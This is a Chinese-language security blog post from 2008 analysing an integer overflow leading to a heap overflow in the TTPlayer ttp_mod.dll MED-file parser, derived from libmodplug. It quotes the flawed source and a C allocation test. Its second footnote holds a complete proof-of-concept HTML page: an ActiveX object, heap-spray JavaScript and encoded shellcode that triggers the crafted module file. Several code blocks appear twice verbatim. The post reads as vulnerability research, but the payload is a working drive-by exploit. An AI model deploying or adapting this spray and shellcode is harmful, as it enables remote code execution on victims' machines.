[Tips]千千静听ttp_mod.dll解析med文件堆溢出的利用分析
Author: void[at]ph4nt0m[dot]org
Blog: http://hi.baidu.com/54nop
Date: 2008-03-31
这个洞是dummy牛发现的,当时我只是看了有问题的源码就觉得最多DoS,没有去实际测试分析,惭愧.没想到dummy牛利用成功.这里事后分析一下:-)
千千静听ttp_mod.dll用的是开源代码,源代码链接:
http://gstreamer.freedesktop.org/src/gst-plugins/gst-plugins-0.8.3.tar.gz
出问题的源代码是gst-plugins-0.8.3/gst/modplug/libmodplug/load_med.cpp里的:
698 // Song Comments
699 UINT annotxt = bswapBE32(pmex->annotxt);
700 UINT annolen = bswapBE32(pmex->annolen);
701 if ((annotxt) && (annolen) && (annotxt+annolen <= dwMemLength))
702 {
703 m_lpszSongComments = new char[annolen+1];
704 memcpy(m_lpszSongComments, lpStream+annotxt, annolen);
705 m_lpszSongComments[annolen] = 0;
706 }
699 UINT annotxt = bswapBE32(pmex->annotxt);
700 UINT annolen = bswapBE32(pmex->annolen);
701 if ((annotxt) && (annolen) && (annotxt+annolen <= dwMemLength))
702 {
703 m_lpszSongComments = new char[annolen+1];
704 memcpy(m_lpszSongComments, lpStream+annotxt, annolen);
705 m_lpszSongComments[annolen] = 0;
706 }
这是个很典型的整数溢出.annolen为0xFFFFFFFF(即有符号整数-1)时,导致703行new char[0],有趣的是这个0字节分配居然成功返回(测试见注[1]),所以即使703行后加上类似if(m_lpszSongComments) {...}的检查代码,也无济于事.
704行进行memcpy,因为annolen为0xFFFFFFFF,毫无疑问导致了堆溢出,触发内存读/写越界异常.
这里更有意思:
用od开启ie,载入poc.html(见注[2]),test.mod构造详见dummy的文章.
当ttp_mod.dll在memcpy触发越界异常后,打开SEH链窗口,将ttpctrl.dll的所有异常处理例程F2断下,Shift+F9忽略异常继续.
在ttpctrl.04EE73F1暂停,进入了CxxFrameHandler异常处理流程,F9继续运行,可以看到这个异常被千千静听处理掉了!这里很关键,直接导致后续的虚函数指针覆盖和HeapSpray利用的可能.如果异常处理例程都不进行处理,只能导致Crash!
最后,shellcode运行,突然弹出来一个窗口,很黄很暴力,我赶紧把它给关了.
除了这个load_med.cpp有问题外,这个源码包好几处都存在类似问题,有兴趣的可以看看.
注释:
注[1]:
malloc(0)的行为: http://c-faq-chn.sourceforge.net/ccfaq/node181.html
关于new char[0]堆分配的测试代码:
---[Cut Below]----------------------------
#include <stdio.h>
void main()
{
int len=0, i=0;
char* p;
len = -1;
p = new char[len];
printf("alloc 0x%08X Bytes at %p\n", len, new char[len]);
len = 0;
p = new char[len];
printf("alloc 0x%08X Bytes at %p\n", len, new char[len]);
while(1)
{
p[i++] = 'A';
}
}
void main()
{
int len=0, i=0;
char* p;
len = -1;
p = new char[len];
printf("alloc 0x%08X Bytes at %p\n", len, new char[len]);
len = 0;
p = new char[len];
printf("alloc 0x%08X Bytes at %p\n", len, new char[len]);
while(1)
{
p[i++] = 'A';
}
}
---[Cut Above]---------------------------
注[2]:
poc.html代码
---[Cut Below]----------------------------
<OBJECT ID="ttp" WIDTH="64" HEIGHT="64" CLASSID="CLSID:89AE5F82-410A-4040-9387-68D1144EFD03"></OBJECT>
<OBJECT ID="ttp2" WIDTH="64" HEIGHT="64" CLASSID="CLSID:89AE5F82-410A-4040-9387-68D1144EFD03"></OBJECT>
<script >
var heapSprayToAddress = 0x0c0c0c0c;
var shellcode = unescape("%u0eeb%u4b5b%uc933%uc6b1%u3480%ufe0b%ufae2%u05eb%uede8%uffff%u17ff%ufe5d%ufefe%u94a1%ua7ce%u759a%u75ff%uf2be%u8e75%u53e2%u9675%u75f6%u9409%ua7fc%ubd16%ufefe%u1cfe%u9607%ucccd%ufefe%u8b96%u9b8d%uaa8c%ue801%u166b%ufed0%ufefe%u96ac%u8c91%ufe99%u9a96%u8a91%u96a3%uce8a%ua593%u8e96%uca96%u9690%u9fa5%ua38a%u8896%u9791%u759a%u7322%uf2b8%uadac%uacae%ua801%u01f6%ufaa8%ua8af%u8b75%u75c2%ud08a%ufd86%ua80b%u8875%ufdde%ucd0b%ub737%u53bf%u3bfd%u25cd%u40f1%uc4ee%u8a28%u3ff6%uf935%u24fd%u15be%uc50f%u8be1%ua019%ua075%ufdda%u9823%uf275%u75b5%ue2a0%u23fd%ufa75%ufd75%u553b%ua7a0%u163d%u01a6%u0101%u8acc%uf26f%u779d%ub12f%uf494%ue0c6%u2244%u3845%u44d2%u4f22%u3f57%udf58%u00fe");
var heapBlockSize = 0x100000;
var payLoadSize = shellcode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u0c0c%u0c0c");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + shellcode;
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
//ttp.URL="c://test.mod";
//ttp.URL="http://192.168.0.100/test.mod";
//ttp.controls.play();
setTimeout('ttp.URL="c:/test.mod";ttp.controls.play();',1000);
//setTimeout('ttp.openURL("http://192.168.0.100/test.mod");ttp.controls.play();',1000);
</SCRIPT>
<OBJECT ID="ttp2" WIDTH="64" HEIGHT="64" CLASSID="CLSID:89AE5F82-410A-4040-9387-68D1144EFD03"></OBJECT>
<script >
var heapSprayToAddress = 0x0c0c0c0c;
var shellcode = unescape("%u0eeb%u4b5b%uc933%uc6b1%u3480%ufe0b%ufae2%u05eb%uede8%uffff%u17ff%ufe5d%ufefe%u94a1%ua7ce%u759a%u75ff%uf2be%u8e75%u53e2%u9675%u75f6%u9409%ua7fc%ubd16%ufefe%u1cfe%u9607%ucccd%ufefe%u8b96%u9b8d%uaa8c%ue801%u166b%ufed0%ufefe%u96ac%u8c91%ufe99%u9a96%u8a91%u96a3%uce8a%ua593%u8e96%uca96%u9690%u9fa5%ua38a%u8896%u9791%u759a%u7322%uf2b8%uadac%uacae%ua801%u01f6%ufaa8%ua8af%u8b75%u75c2%ud08a%ufd86%ua80b%u8875%ufdde%ucd0b%ub737%u53bf%u3bfd%u25cd%u40f1%uc4ee%u8a28%u3ff6%uf935%u24fd%u15be%uc50f%u8be1%ua019%ua075%ufdda%u9823%uf275%u75b5%ue2a0%u23fd%ufa75%ufd75%u553b%ua7a0%u163d%u01a6%u0101%u8acc%uf26f%u779d%ub12f%uf494%ue0c6%u2244%u3845%u44d2%u4f22%u3f57%udf58%u00fe");
var heapBlockSize = 0x100000;
var payLoadSize = shellcode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u0c0c%u0c0c");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + shellcode;
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
//ttp.URL="c://test.mod";
//ttp.URL="http://192.168.0.100/test.mod";
//ttp.controls.play();
setTimeout('ttp.URL="c:/test.mod";ttp.controls.play();',1000);
//setTimeout('ttp.openURL("http://192.168.0.100/test.mod");ttp.controls.play();',1000);
</SCRIPT>
---[Cut Above]---------------------------
1 条评论:
百度的图片在这里显示不出来
发表评论